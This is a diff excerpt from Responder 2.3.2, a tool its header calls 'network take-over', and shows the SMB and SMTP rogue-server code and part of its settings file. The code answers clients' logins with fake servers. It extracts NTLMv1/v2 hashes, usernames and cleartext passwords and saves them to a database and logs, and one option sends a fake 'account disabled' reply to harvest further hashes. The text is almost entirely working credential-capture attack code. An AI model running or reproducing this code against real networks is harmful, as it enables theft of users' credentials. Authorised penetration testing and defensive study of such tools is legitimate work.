LMhashLen = struct.unpack('<H',data[51:53])[0]
|
||||||
|
return LMhashLen in [0, 1]
|
||||||
|
|
||||||
|
#Function used to know which dialect number to return for NT LM 0.12
|
||||||
|
def Parse_Nego_Dialect(data):
|
||||||
|
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
|
||||||
|
for i in range(0, 16):
|
||||||
|
if Dialect[i] == 'NT LM 0.12':
|
||||||
|
return chr(i) + '\x00'
|
||||||
|
|
||||||
|
|
||||||
|
def midcalc(data): #Set MID SMB Header field.
|
||||||
|
return data[34:36]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def uidcalc(data): #Set UID SMB Header field.
|
||||||
|
return data[32:34]
|
||||||
|
|
||||||
|
|
||||||
|
def pidcalc(data): #Set PID SMB Header field.
|
||||||
|
pack=data[30:32]
|
||||||
|
return pack
|
||||||
|
|
||||||
|
|
||||||
|
def tidcalc(data): #Set TID SMB Header field.
|
||||||
|
pack=data[28:30]
|
||||||
|
return pack
|
||||||
|
|
||||||
|
def ParseShare(data):
|
||||||
|
packet = data[:]
|
||||||
|
a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
|
||||||
|
if a:
|
||||||
|
print text("[SMB] Requested Share : %s" % a.group(0).decode('UTF-16LE'))
|
||||||
|
|
||||||
|
def GrabMessageID(data):
|
||||||
|
Messageid = data[28:36]
|
||||||
|
return Messageid
|
||||||
|
|
||||||
|
def GrabCreditRequested(data):
|
||||||
|
CreditsRequested = data[18:20]
|
||||||
|
if CreditsRequested == "\x00\x00":
|
||||||
|
CreditsRequested = "\x01\x00"
|
||||||
|
else:
|
||||||
|
CreditsRequested = data[18:20]
|
||||||
|
return CreditsRequested
|
||||||
|
|
||||||
|
def GrabCreditCharged(data):
|
||||||
|
CreditCharged = data[10:12]
|
||||||
|
return CreditCharged
|
||||||
|
|
||||||
|
def GrabSessionID(data):
|
||||||
|
SessionID = data[44:52]
|
||||||
|
return SessionID
|
||||||
|
|
||||||
|
def ParseSMBHash(data,client): #Parse SMB NTLMSSP v1/v2
|
||||||
|
SecBlobLen = struct.unpack('<H',data[51:53])[0]
|
||||||
|
BccLen = struct.unpack('<H',data[61:63])[0]
|
||||||
|
|
||||||
|
if SecBlobLen < 260:
|
||||||
|
SSPIStart = data[75:]
|
||||||
|
LMhashLen = struct.unpack('<H',data[89:91])[0]
|
||||||
|
LMhashOffset = struct.unpack('<H',data[91:93])[0]
|
||||||
|
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||||
|
NthashLen = struct.unpack('<H',data[97:99])[0]
|
||||||
|
NthashOffset = struct.unpack('<H',data[99:101])[0]
|
||||||
|
else:
|
||||||
|
SSPIStart = data[79:]
|
||||||
|
LMhashLen = struct.unpack('<H',data[93:95])[0]
|
||||||
|
LMhashOffset = struct.unpack('<H',data[95:97])[0]
|
||||||
|
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||||
|
NthashLen = struct.unpack('<H',data[101:103])[0]
|
||||||
|
NthashOffset = struct.unpack('<H',data[103:105])[0]
|
||||||
|
|
||||||
|
if NthashLen == 24:
|
||||||
|
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||||
|
DomainLen = struct.unpack('<H',data[105:107])[0]
|
||||||
|
DomainOffset = struct.unpack('<H',data[107:109])[0]
|
||||||
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
|
||||||
|
UserLen = struct.unpack('<H',data[113:115])[0]
|
||||||
|
UserOffset = struct.unpack('<H',data[115:117])[0]
|
||||||
|
Username = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'SMB',
|
||||||
|
'type': 'NTLMv1-SSP',
|
||||||
|
'client': client,
|
||||||
|
'user': Domain+'\\'+Username,
|
||||||
|
'hash': SMBHash,
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
if NthashLen > 60:
|
||||||
|
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||||
|
DomainLen = struct.unpack('<H',data[109:111])[0]
|
||||||
|
DomainOffset = struct.unpack('<H',data[111:113])[0]
|
||||||
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
|
||||||
|
UserLen = struct.unpack('<H',data[117:119])[0]
|
||||||
|
UserOffset = struct.unpack('<H',data[119:121])[0]
|
||||||
|
Username = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'SMB',
|
||||||
|
'type': 'NTLMv2-SSP',
|
||||||
|
'client': client,
|
||||||
|
'user': Domain+'\\'+Username,
|
||||||
|
'hash': SMBHash,
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
|
||||||
|
def ParseSMB2NTLMv2Hash(data,client): #Parse SMB NTLMv2
|
||||||
|
SSPIStart = data[113:]
|
||||||
|
data = data[113:]
|
||||||
|
LMhashLen = struct.unpack('<H',data[12:14])[0]
|
||||||
|
LMhashOffset = struct.unpack('<H',data[16:18])[0]
|
||||||
|
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||||
|
NthashLen = struct.unpack('<H',data[22:24])[0]
|
||||||
|
NthashOffset = struct.unpack('<H',data[24:26])[0]
|
||||||
|
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||||
|
DomainLen = struct.unpack('<H',data[30:32])[0]
|
||||||
|
DomainOffset = struct.unpack('<H',data[32:34])[0]
|
||||||
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
|
||||||
|
UserLen = struct.unpack('<H',data[38:40])[0]
|
||||||
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
||||||
|
Username = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'SMBv2',
|
||||||
|
'type': 'NTLMv2-SSP',
|
||||||
|
'client': client,
|
||||||
|
'user': Domain+'\\'+Username,
|
||||||
|
'hash': SMBHash,
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
def ParseLMNTHash(data, client): # Parse SMB NTLMv1/v2
|
||||||
|
LMhashLen = struct.unpack('<H',data[51:53])[0]
|
||||||
|
NthashLen = struct.unpack('<H',data[53:55])[0]
|
||||||
|
Bcc = struct.unpack('<H',data[63:65])[0]
|
||||||
|
Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
|
||||||
|
|
||||||
|
if NthashLen > 25:
|
||||||
|
FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
|
||||||
|
LmHash = FullHash[:32].upper()
|
||||||
|
NtHash = FullHash[32:].upper()
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'SMB',
|
||||||
|
'type': 'NTLMv2',
|
||||||
|
'client': client,
|
||||||
|
'user': Domain+'\\'+Username,
|
||||||
|
'hash': NtHash,
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
if NthashLen == 24:
|
||||||
|
NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
|
||||||
|
LmHash = data[65:65+LMhashLen].encode('hex').upper()
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'SMB',
|
||||||
|
'type': 'NTLMv1',
|
||||||
|
'client': client,
|
||||||
|
'user': Domain+'\\'+Username,
|
||||||
|
'hash': NtHash,
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
def IsNT4ClearTxt(data, client):
|
||||||
|
HeadLen = 36
|
||||||
|
|
||||||
|
if data[14:16] == "\x03\x80":
|
||||||
|
SmbData = data[HeadLen+14:]
|
||||||
|
WordCount = data[HeadLen]
|
||||||
|
ChainedCmdOffset = data[HeadLen+1]
|
||||||
|
|
||||||
|
if ChainedCmdOffset == "\x75":
|
||||||
|
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
|
||||||
|
|
||||||
|
if PassLen > 2:
|
||||||
|
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
|
||||||
|
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
|
||||||
|
print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
|
||||||
|
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
|
||||||
|
|
||||||
|
|
||||||
|
class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
self.ntry = 0
|
||||||
|
while True:
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
self.request.settimeout(1)
|
||||||
|
|
||||||
|
if not data:
|
||||||
|
break
|
||||||
|
|
||||||
|
if data[0] == "\x81": #session request 139
|
||||||
|
Buffer = "\x82\x00\x00\x00"
|
||||||
|
try:
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
##Negotiate proto answer SMBv2.
|
||||||
|
if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data):
|
||||||
|
head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
|
||||||
|
t = SMB2NegoAns()
|
||||||
|
t.calculate()
|
||||||
|
packet1 = str(head)+str(t)
|
||||||
|
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
|
||||||
|
self.request.send(buffer1)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
## Session Setup 1 answer SMBv2.
|
||||||
|
if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
|
||||||
|
head = SMB2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
|
||||||
|
t = SMB2NegoAns(Dialect="\x10\x02")
|
||||||
|
t.calculate()
|
||||||
|
packet1 = str(head)+str(t)
|
||||||
|
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
|
||||||
|
self.request.send(buffer1)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
## Session Setup 2 answer SMBv2.
|
||||||
|
if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
|
||||||
|
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0")
|
||||||
|
t = SMB2Session1Data()
|
||||||
|
t.calculate()
|
||||||
|
packet1 = str(head)+str(t)
|
||||||
|
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
|
||||||
|
self.request.send(buffer1)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
## Session Setup 3 answer SMBv2.
|
||||||
|
if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
|
||||||
|
ParseSMB2NTLMv2Hash(data, self.client_address[0])
|
||||||
|
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
|
||||||
|
t = SMB2Session2Data()
|
||||||
|
packet1 = str(head)+str(t)
|
||||||
|
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
|
||||||
|
self.request.send(buffer1)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
# Negotiate Protocol Response smbv1
|
||||||
|
if data[8:10] == "\x72\x00" and data[4:5] == "\xff" and re.search("SMB 2.\?\?\?", data) == None:
|
||||||
|
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
|
||||||
|
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[8:10] == "\x73\x00" and data[4:5] == "\xff": # Session Setup AndX Request smbv1
|
||||||
|
IsNT4ClearTxt(data, self.client_address[0])
|
||||||
|
|
||||||
|
# STATUS_MORE_PROCESSING_REQUIRED
|
||||||
|
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
|
||||||
|
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
|
||||||
|
Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
|
||||||
|
else:
|
||||||
|
Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
|
||||||
|
if data[8:10] == "\x73\x00" and data[4:5] == "\xff": # STATUS_SUCCESS
|
||||||
|
if Is_Anonymous(data):
|
||||||
|
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
|
||||||
|
Body = SMBSessEmpty()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
|
||||||
|
else:
|
||||||
|
# Parse NTLMSSP_AUTH packet
|
||||||
|
ParseSMBHash(data,self.client_address[0])
|
||||||
|
|
||||||
|
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
|
||||||
|
# Send ACCOUNT_DISABLED to get multiple hashes if there are any
|
||||||
|
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
|
||||||
|
Body = SMBSessEmpty()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
self.ntry += 1
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Send STATUS_SUCCESS
|
||||||
|
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
Body = SMBSession2Accept()
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
|
||||||
|
if data[8:10] == "\x75\x00" and data[4:5] == "\xff": # Tree Connect AndX Request
|
||||||
|
ParseShare(data)
|
||||||
|
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
|
||||||
|
Body = SMBTreeData()
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[8:10] == "\x71\x00" and data[4:5] == "\xff": #Tree Disconnect
|
||||||
|
Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
Body = "\x00\x00\x00"
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[8:10] == "\xa2\x00" and data[4:5] == "\xff": #NT_CREATE Access Denied.
|
||||||
|
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
Body = "\x00\x00\x00"
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[8:10] == "\x25\x00" and data[4:5] == "\xff": # Trans2 Access Denied.
|
||||||
|
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
Body = "\x00\x00\x00"
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
|
||||||
|
if data[8:10] == "\x74\x00" and data[4:5] == "\xff": # LogOff
|
||||||
|
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
Body = "\x02\xff\x00\x27\x00\x00\x00"
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
except socket.error:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
class SMB1LM(BaseRequestHandler): # SMB Server class, old version
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
self.request.settimeout(0.5)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[0] == "\x81": #session request 139
|
||||||
|
Buffer = "\x82\x00\x00\x00"
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[8:10] == "\x72\x00": #Negotiate proto answer.
|
||||||
|
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
|
||||||
|
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
|
||||||
|
Body.calculate()
|
||||||
|
Packet = str(head)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[8:10] == "\x73\x00": #Session Setup AndX Request
|
||||||
|
if Is_LMNT_Anonymous(data):
|
||||||
|
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
Packet = str(head)+str(SMBSessEmpty())
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
self.request.send(Buffer)
|
||||||
|
else:
|
||||||
|
ParseLMNTHash(data,self.client_address[0])
|
||||||
|
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
||||||
|
Packet = str(head) + str(SMBSessEmpty())
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
except Exception:
|
||||||
|
self.request.close()
|
||||||
|
pass
|
||||||
62
servers/SMTP.py
Normal file
62
servers/SMTP.py
Normal file
@@ -0,0 +1,62 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from utils import *
|
||||||
|
from base64 import b64decode
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
|
||||||
|
|
||||||
|
class ESMTP(BaseRequestHandler):
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
self.request.send(str(SMTPGreeting()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[0:4] == "EHLO":
|
||||||
|
self.request.send(str(SMTPAUTH()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[0:4] == "AUTH":
|
||||||
|
self.request.send(str(SMTPAUTH1()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data:
|
||||||
|
try:
|
||||||
|
User = filter(None, b64decode(data).split('\x00'))
|
||||||
|
Username = User[0]
|
||||||
|
Password = User[1]
|
||||||
|
except:
|
||||||
|
Username = b64decode(data)
|
||||||
|
|
||||||
|
self.request.send(str(SMTPAUTH2()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data:
|
||||||
|
try: Password = b64decode(data)
|
||||||
|
except: Password = data
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'SMTP',
|
||||||
|
'type': 'Cleartext',
|
||||||
|
'client': self.client_address[0],
|
||||||
|
'user': Username,
|
||||||
|
'cleartext': Password,
|
||||||
|
'fullhash': Username+":"+Password,
|
||||||
|
})
|
||||||
|
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
0
servers/__init__.py
Normal file
0
servers/__init__.py
Normal file
221
settings.py
Normal file
221
settings.py
Normal file
@@ -0,0 +1,221 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import utils
|
||||||
|
import ConfigParser
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
__version__ = 'Responder 2.3.2'
|
||||||
|
|
||||||
|
class Settings:
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self.ResponderPATH = os.path.dirname(__file__)
|
||||||
|
self.Bind_To = '0.0.0.0'
|
||||||
|
|
||||||
|
def __str__(self):
|
||||||
|
ret = 'Settings class:\n'
|
||||||
|
for attr in dir(self):
|
||||||
|
value = str(getattr(self, attr)).strip()
|
||||||
|
ret += " Settings.%s = %s\n" % (attr, value)
|
||||||
|
return ret
|
||||||
|
|
||||||
|
def toBool(self, str):
|
||||||
|
return str.upper() == 'ON'
|
||||||
|
|
||||||
|
def ExpandIPRanges(self):
|
||||||
|
def expand_ranges(lst):
|
||||||
|
ret = []
|
||||||
|
for l in lst:
|
||||||
|
tab = l.split('.')
|
||||||
|
x = {}
|
||||||
|
i = 0
|
||||||
|
for byte in tab:
|
||||||
|
if '-' not in byte:
|
||||||
|
x[i] = x[i+1] = int(byte)
|
||||||
|
else:
|
||||||
|
b = byte.split('-')
|
||||||
|
x[i] = int(b[0])
|
||||||
|
x[i+1] = int(b[1])
|
||||||
|
i += 2
|
||||||
|
for a in range(x[0], x[1]+1):
|
||||||
|
for b in range(x[2], x[3]+1):
|
||||||
|
for c in range(x[4], x[5]+1):
|
||||||
|
for d in range(x[6], x[7]+1):
|
||||||
|
ret.append('%d.%d.%d.%d' % (a, b, c, d))
|
||||||
|
return ret
|
||||||
|
|
||||||
|
self.RespondTo = expand_ranges(self.RespondTo)
|
||||||
|
self.DontRespondTo = expand_ranges(self.DontRespondTo)
|
||||||
|
|
||||||
|
def populate(self, options):
|
||||||
|
|
||||||
|
if options.Interface is None and utils.IsOsX() is False:
|
||||||
|
print utils.color("Error: -I <if> mandatory option is missing", 1)
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
# Config parsing
|
||||||
|
config = ConfigParser.ConfigParser()
|
||||||
|
config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
|
||||||
|
|
||||||
|
# Servers
|
||||||
|
self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP'))
|
||||||
|
self.SSL_On_Off = self.toBool(config.get('Responder Core', 'HTTPS'))
|
||||||
|
self.SMB_On_Off = self.toBool(config.get('Responder Core', 'SMB'))
|
||||||
|
self.SQL_On_Off = self.toBool(config.get('Responder Core', 'SQL'))
|
||||||
|
self.FTP_On_Off = self.toBool(config.get('Responder Core', 'FTP'))
|
||||||
|
self.POP_On_Off = self.toBool(config.get('Responder Core', 'POP'))
|
||||||
|
self.IMAP_On_Off = self.toBool(config.get('Responder Core', 'IMAP'))
|
||||||
|
self.SMTP_On_Off = self.toBool(config.get('Responder Core', 'SMTP'))
|
||||||
|
self.LDAP_On_Off = self.toBool(config.get('Responder Core', 'LDAP'))
|
||||||
|
self.DNS_On_Off = self.toBool(config.get('Responder Core', 'DNS'))
|
||||||
|
self.Krb_On_Off = self.toBool(config.get('Responder Core', 'Kerberos'))
|
||||||
|
|
||||||
|
# Db File
|
||||||
|
self.DatabaseFile = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database'))
|
||||||
|
|
||||||
|
# Log Files
|
||||||
|
self.LogDir = os.path.join(self.ResponderPATH, 'logs')
|
||||||
|
|
||||||
|
if not os.path.exists(self.LogDir):
|
||||||
|
os.mkdir(self.LogDir)
|
||||||
|
|
||||||
|
self.SessionLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'SessionLog'))
|
||||||
|
self.PoisonersLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'PoisonersLog'))
|
||||||
|
self.AnalyzeLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'AnalyzeLog'))
|
||||||
|
self.ResponderConfigDump = os.path.join(self.LogDir, config.get('Responder Core', 'ResponderConfigDump'))
|
||||||
|
|
||||||
|
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
|
||||||
|
self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
|
||||||
